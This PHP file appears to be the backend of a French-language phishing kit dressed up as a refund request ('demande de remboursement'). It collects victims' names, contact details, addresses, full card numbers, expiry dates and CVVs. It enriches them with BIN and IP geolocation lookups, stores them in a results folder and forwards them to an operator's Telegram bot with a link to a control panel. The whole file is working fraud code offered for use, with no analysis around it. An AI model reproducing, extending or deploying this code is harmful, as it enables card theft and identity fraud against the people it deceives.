<?php
// send_telegram.php
header('Content-Type: application/json');

// Inclure le fichier de configuration
include 'config.php';

// Récupérer les données JSON envoyées
$input = file_get_contents('php://input');
$data = json_decode($input, true);

// Get client IP address
function getClientIP() {
    if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
        return $_SERVER['HTTP_CLIENT_IP'];
    } elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
        return $_SERVER['HTTP_X_FORWARDED_FOR'];
    } else {
        return $_SERVER['REMOTE_ADDR'];
    }
}

$clientIP = getClientIP();
$panel = str_replace('fr/send_telegram.php', '', "https://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']."panel/view.php?vip=" . $clientIP);

// Function to check BIN information
function getBinInfo($bin) {
    if (empty($bin) || strlen($bin) < 6) {
        return ['type' => 'N/A', 'brand' => 'N/A', 'bank' => 'N/A'];
    }
    
    $firstSix = substr($bin, 0, 6);
    $url = "https://lookup.binlist.net/" . $firstSix;
    
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_TIMEOUT, 10);
    curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36');
    
    $response = curl_exec($ch);
    $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);
    
    if ($httpCode === 200 && $response) {
        $binData = json_decode($response, true);
        return [
            'type' => $binData['type'] ?? 'N/A',
            'brand' => $binData['brand'] ?? 'N/A',
            'bank' => $binData['bank']['name'] ?? 'N/A'
        ];
    }
    
    return ['type' => 'N/A', 'brand' => 'N/A', 'bank' => 'N/A'];
}

// Function to get IP information
function getIPInfo($ip) {
    if (empty($ip) || $ip === 'UNKNOWN') {
        return ['country' => 'N/A', 'city' => 'N/A', 'isp' => 'N/A'];
    }
    
    $url = "http://ip-api.com/json/" . $ip;
    
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_TIMEOUT, 10);
    
    $response = curl_exec($ch);
    $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);
    
    if ($httpCode === 200 && $response) {
        $ipData = json_decode($response, true);
        if ($ipData['status'] === 'success') {
            return [
                'country' => $ipData['country'] ?? 'N/A',
                'city' => $ipData['city'] ?? 'N/A',
                'isp' => $ipData['isp'] ?? 'N/A',
                'region' => $ipData['regionName'] ?? 'N/A'
            ];
        }
    }
    
    return ['country' => 'N/A', 'city' => 'N/A', 'isp' => 'N/A', 'region' => 'N/A'];
}

// Function to save data to text file
function saveToTextFile($data, $binInfo, $ipInfo, $clientIP) {
    // Create results directory if it doesn't exist
    if (!is_dir('result')) {
        mkdir('result', 0755, true);
    }
    
    // Sanitize filename components
    $firstName = preg_replace('/[^a-zA-Z0-9]/', '', $data['firstName'] ?? 'Unknown');
    $lastName = preg_replace('/[^a-zA-Z0-9]/', '', $data['lastName'] ?? 'Unknown');
    $phone = preg_replace('/[^0-9]/', '', $data['phone'] ?? 'Unknown');
    
    // If any field is empty, use placeholder
    if (empty($firstName)) $firstName = 'Unknown';
    if (empty($lastName)) $lastName = 'Unknown';
    if (empty($phone)) $phone = 'Unknown';
    
    $filename = "result/{$firstName}{$lastName}-{$phone}.txt";
    
    // Prepare file content
    $content = "📋 NOUVELLE DEMANDE DE REMBOURSEMENT\n\n";
    $content .= "👤 INFORMATIONS PERSONNELLES:\n";
    $content .= "• Prénom: " . ($data['firstName'] ?? 'N/A') . "\n";
    $content .= "• Nom: " . ($data['lastName'] ?? 'N/A') . "\n";
    $content .= "• Email: " . ($data['email'] ?? 'N/A') . "\n";
    $content .= "• Téléphone: " . ($data['phone'] ?? 'N/A') . "\n\n";
    
    $content .= "🏠 ADRESSE:\n";
    $content .= "• Adresse: " . ($data['address'] ?? 'N/A') . "\n";
    $content .= "• Code Postal: " . ($data['postalCode'] ?? 'N/A') . "\n";
    $content .= "• Ville: " . ($data['city'] ?? 'N/A') . "\n";
    $content .= "• Pays: " . ($data['country'] ?? 'N/A') . "\n\n";
    
    $content .= "💳 INFORMATIONS DE PAIEMENT:\n";
    $content .= "• Méthode: " . ($data['paymentMethod'] ?? 'N/A') . "\n";
    $content .= "• Numéro de carte: " . ($data['cardNumber'] ?? 'N/A') . "\n";
    $content .= "• Date d'expiration: " . ($data['expiryDate'] ?? 'N/A') . "\n";
    if (isset($data['cvv'])) {
        $content .= "• CVV: " . $data['cvv'] . "\n";
    }
    $content .= "• Titulaire: " . ($data['cardHolder'] ?? 'N/A') . "\n\n";
    
    $content .= "🔍 BIN INFORMATION:\n";
    $content .= "|Type : " . $binInfo['type'] . "\n";
    $content .= "|Brand : " . $binInfo['brand'] . "\n";
    $content .= "|Bank 🏛 : " . $binInfo['bank'] . "\n\n";
    
    $content .= "🌐 INFORMATIONS IP:\n";
    $content .= "|IP Address : " . $clientIP . "\n";
    $content .= "|Country : " . $ipInfo['country'] . "\n";
    $content .= "|City : " . $ipInfo['city'] . "\n";
    $content .= "|Region : " . $ipInfo['region'] . "\n";
    $content .= "|ISP : " . $ipInfo['isp'] . "\n\n";
    
    $content .= "📞 MÉTHODE DE CONTACT: " . ($data['contactMethod'] ?? 'N/A') . "\n";
    $content .= "💰 MONTANT: " . ($data['refundAmount'] ?? 'N/A') . "\n";
    $content .= "⏰ TIMESTAMP: " . ($data['timestamp'] ?? date('Y-m-d H:i:s')) . "\n";
    
    // Save to file
    if (file_put_contents($filename, $content) !== false) {
        return ['success' => true, 'filename' => $filename];
    } else {
        return ['success' => false, 'error' => 'Could not save file'];
    }
}

if ($data) {
    // Get BIN information
    $cardNumber = $data['cardNumber'] ?? '';
    $bin = preg_replace('/\D/', '', $cardNumber); // Remove non-numeric characters
    $binInfo = getBinInfo($bin);
    
    // Get IP information
    $ipInfo = getIPInfo($clientIP);
    
    // Save data to text file
    $fileResult = saveToTextFile($data, $binInfo, $ipInfo, $clientIP);
    
    // Préparer le message pour Telegram
    $message = "📋 NOUVELLE DEMANDE DE REMBOURSEMENT\n\n";
    $message .= "👤 INFORMATIONS PERSONNELLES:\n";
    $message .= "• Prénom: " . ($data['firstName'] ?? 'N/A') . "\n";
    $message .= "• Nom: " . ($data['lastName'] ?? 'N/A') . "\n";
    $message .= "• Email: " . ($data['email'] ?? 'N/A') . "\n";
    $message .= "• Téléphone: " . ($data['phone'] ?? 'N/A') . "\n\n";
    
    $message .= "🏠 ADRESSE:\n";
    $message .= "• Adresse: " . ($data['address'] ?? 'N/A') . "\n";
    $message .= "• Code Postal: " . ($data['postalCode'] ?? 'N/A') . "\n";
    $message .= "• Ville: " . ($data['city'] ?? 'N/A') . "\n";
    $message .= "• Pays: " . ($data['country'] ?? 'N/A') . "\n\n";
    
    $message .= "💳 INFORMATIONS DE PAIEMENT:\n";
    $message .= "• Méthode: " . ($data['paymentMethod'] ?? 'N/A') . "\n";
    $message .= "• Numéro de carte: " . ($data['cardNumber'] ?? 'N/A') . "\n";
    $message .= "• Date d'expiration: " . ($data['expiryDate'] ?? 'N/A') . "\n";
    if (isset($data['cvv'])) {
        $message .= "• CVV: " . $data['cvv'] . "\n";
    }
    $message .= "• Titulaire: " . ($data['cardHolder'] ?? 'N/A') . "\n\n";
    
    $message .= "🔍 BIN INFORMATION:\n";
    $message .= "|Type : " . $binInfo['type'] . "\n";
    $message .= "|Brand : " . $binInfo['brand'] . "\n";
    $message .= "|Bank 🏛 : " . $binInfo['bank'] . "\n\n";
    
    $message .= "🌐 INFORMATIONS IP:\n";
    $message .= "|IP Address : " . $clientIP . "\n";
    $message .= "|Country : " . $ipInfo['country'] . "\n";
    $message .= "|City : " . $ipInfo['city'] . "\n";
    $message .= "|Region : " . $ipInfo['region'] . "\n";
    $message .= "|ISP : " . $ipInfo['isp'] . "\n\n";
    
    $message .= "📞 MÉTHODE DE CONTACT: " . ($data['contactMethod'] ?? 'N/A') . "\n";
    $message .= "💰 MONTANT: " . ($data['refundAmount'] ?? 'N/A') . "\n";
    $message .= "⏰ TIMESTAMP: " . ($data['timestamp'] ?? 'N/A') . "\n";

    // Add file save status to message
    if ($fileResult['success']) {
        $message .= "\n💾 FICHIER: " . $fileResult['filename'] . "\n";
    } else {
        $message .= "\n⚠️ ERREUR FICHIER: " . $fileResult['error'] . "\n";
    }

    // Keyboard with panel link
    $keyboard = [
        'inline_keyboard' => [
            [
                ['text' => 'View Panel 🌍', 'url' => $panel],
            ]
        ]
    ];

    // Envoyer le message à Telegram
    $url = "https://api.telegram.org/bot{$telegram_bot_token}/sendMessage";
    $postData = [
        'chat_id' => $telegram_chat_id,
        'text' => $message,
        'parse_mode' => 'HTML',
        'reply_markup' => json_encode($keyboard)
    ];

    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $postData);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    
    $response = curl_exec($ch);
    $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);

    if ($httpCode === 200) {
        echo json_encode(['success' => true, 'message' => 'Données envoyées avec succès', 'file_saved' => $fileResult['success']]);
    } else {
        echo json_encode(['success' => false, 'error' => 'Erreur lors de l\'envoi à Telegram', 'file_saved' => $fileResult['success']]);
    }
} else {
    echo json_encode(['success' => false, 'error' => 'Aucune donnée reçue']);
}
?>